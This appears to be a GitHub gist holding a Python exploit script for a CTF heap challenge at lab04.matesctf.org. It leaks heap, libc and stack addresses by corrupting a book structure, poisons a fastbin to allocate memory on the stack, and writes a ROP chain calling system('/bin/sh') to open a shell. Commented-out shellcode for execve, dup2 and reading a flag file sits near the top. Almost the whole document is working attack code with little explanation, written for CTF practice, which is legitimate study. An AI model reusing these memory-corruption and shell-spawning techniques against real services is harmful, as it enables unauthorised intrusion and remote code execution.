Last active
May 30, 2016 07:37
-
-
Save Mipu94/27a2c5a465b2e1df07ad1df5e80ac955 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
sys.path.append("/home/athos/ctf/form") | |
from customlibpwn import * | |
global s | |
#def write_got(system,got_addr,n): | |
#def virtual_chunk(save_addr,bit=32) | |
#64bit fmt stack/bit + 6 | |
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05 | |
#32 system=0x468f0 ; binsh=0x17dbc5 | |
#64 system=0x46640 ; binsh=0x17ccdb | |
#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" | |
#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" | |
#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4" | |
####################################################### | |
# DEBUG PEDA | |
####################################################### | |
struct=""" | |
struct_book | |
{ | |
_DWORD protect; | |
char title; | |
32 meepwn; | |
_DWORD book_size; | |
char *content; | |
}; | |
""" | |
f=open("peda-debug","w") | |
f.write(struct) | |
f.close() | |
#0x7F0C6 _int_free+422 checkback | |
#0x7F11B _int_free+507 checknext | |
#0x7F282 _int_free+507 checknext | |
"""b*_int_free | |
b*_int_free+422 | |
b*_int_free+507 | |
b*_int_free+481 | |
b*_int_free+866 | |
""" | |
debug=""" | |
b*fgets+244 | |
b*0x400DD9 | |
b*0x4010E6 | |
b*0x400D6B | |
""" | |
filename="" | |
f=open("peda-cmd","w") | |
#f.write("source /home/athos/ctf/form/gdbheapload") | |
f.write(debug) | |
f.close() | |
def p(m): | |
return pack("<Q", m) | |
def u(m): | |
return unpack("<Q", m)[0] | |
######################################################## | |
# PWN! PWN! PWN! | |
######################################################## | |
def add_book(size,title,content): | |
send("1\n") | |
recvu("Enter book size:") | |
send(str(size)+"\n") | |
recvu("Enter book title:") | |
send(title+"\n") | |
recvu("Enter book content:") | |
send(content+"\n") | |
recvu("Protect this book? (y/N)") | |
send("y\n") | |
recvu("$>") | |
def del_book(id): | |
send("2\n") | |
recvu("Enter book id:") | |
send(str(id)+"\n") | |
def doexploit(): | |
s=sock("lab04.matesctf.org",1337) | |
#s=sock("localhost",4000) | |
recvu("$>") | |
send("5\n") | |
recvu("Enter pass phrase:") | |
send("\xbbDhQ\xb8\xae"+"\n") | |
recvu("$>") | |
add_book(0x100,"A"*30,"1"*0x90) | |
add_book(0x30,"B"*30,"2"*0x20) | |
add_book(0x20,"C"*30,"3"*0x10) | |
#leak heap | |
del_book(1) | |
#presize chunk_size protect title size pointer_heap | |
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*31+"AAAA" #XXXXXX | |
add_book(0x1f0,"A"*32,payload) | |
send("3\n") | |
recvu("Enter book id:") | |
send("2\n") | |
leak=recvu("$>") | |
d=leak.find("flag") | |
heapleak = u(leak[d+0x24:d+0x2c]) | |
heapbase = heapleak - 0x290 | |
#leak libc | |
fopen=0x6020A0 | |
del_book(1) | |
#presize chunk_size protect title size pointer_heap | |
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(fopen) | |
add_book(0x1f0,"A"*32,payload) | |
send("3\n") | |
recvu("Enter book id:") | |
send("2\n") | |
leak=recvu("$>") | |
d = leak.find("Content:") | |
leak = leak[d+9:d+17] | |
libc=u(leak) | |
#dtors = baselibc + 0x5e26f0L | |
#baselibc = libc - 0x6e4e0 | |
#system =baselibc + 0x46640 | |
#binsh = baselibc + 0x17ccdb | |
baselibc = libc - 0x6e410 | |
system =baselibc + 0x46590 | |
binsh = baselibc + 0x17c8c3 | |
tls_dtor_list = baselibc + 0x5e26f0L | |
print "heapbase %s "%hex(heapbase) | |
print "leak fopen %s"%hex(libc) | |
print "baseblibc %s"%hex(baselibc) | |
print "system %s"%hex(system) | |
print "binsh %s"%hex(binsh) | |
print "tls_dtor_list %s"%hex(tls_dtor_list) | |
###############################FAIL############################################################ | |
#create fake pchunk and remove book id=2,consolidate forward backward => write dtors | |
#del_book(1) | |
# #presize chunk_size protect title size pointer_heap | |
#chunk_addr = heapbase + 0x160 | |
#callers_addr = heapbase + 0x50 | |
#print "free chunk %s"%hex(chunk_addr) | |
#print "callers %s"%hex(callers_addr) | |
#(tls_dtor_list-X*5)+X*5 = &(system | binsh ...)= callers_addr | |
#P->fd_nextsize->bk_nextsize = P->bk_nextsize | |
#chunk = p(0x30) + p(0x90) + "K"*40 + p(heapbase+0x2b0) + "D"*(0x90-64) + p(0)+p(0x11)+p(0)+p(0) | |
#p_chunk_addr = chunk_addr - 0x40 | |
#p_chunk = p(0) + p(0x400) + p(p_chunk_addr)+p(p_chunk_addr)+p(tls_dtor_list-0x40)+p(callers_addr) | |
#payload = p(system)+p(binsh)+(chunk_addr-callers_addr-0x50)*"X"+ p_chunk + chunk | |
#add_book(0x1f0,"A"*32,payload) | |
#send("2\n") | |
#recvu("Enter book id:") | |
#raw_input(">>>") | |
#send("2\n") | |
#recvu("$>") | |
############################################################################################## | |
#leak stack | |
#p_leakstack = baselibc + 0x5c9a40L | |
p_leakstack = baselibc + 0x3c14a0L | |
del_book(1) | |
#presize chunk_size protect title size pointer_heap | |
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(p_leakstack) #XXXXXX | |
add_book(0x1f0,"A"*32,payload) | |
send("3\n") | |
recvu("Enter book id:") | |
send("2\n") | |
leak=recvu("$>") | |
d=leak.find("Content:\n") | |
stack = u(leak[d+9:d+17]) | |
print "leakstack: ",hex(stack) | |
#fake fastbin fd = stackaddr ; malloc fastbin(stack) and write to stack | |
del_book(1) | |
#presize chunk_size protect title size pointer_heap | |
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(heapbase+0x1a0) #XXXXXX | |
#write to stack | |
addr_stack = stack-0x156-8 | |
add_book(0x1f0,"A"*32,payload) | |
del_book(2) | |
del_book(1) | |
#fake fastbin fd | |
payload = "X"*0x100+p(0x110)+p(0x40)+p(addr_stack) | |
add_book(0x1f0,"A"*32,payload) | |
#malloc fastbin,write rop to stack | |
prdiret = 0x401243 | |
rop = "A"*(0x30-34)+p(prdiret)+p(binsh)+ p(system) | |
send("1\n") | |
recvu("Enter book size:") | |
send(str(0x30)+"\n") | |
recvu("Enter book title:") | |
send("A"*30+"\n") | |
recvu("Enter book content:") | |
send(rop+"\n") | |
print "shell>> " | |
telnet() | |
s.close() | |
doexploit() | |
# flag :matesctf{null byte corruption} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment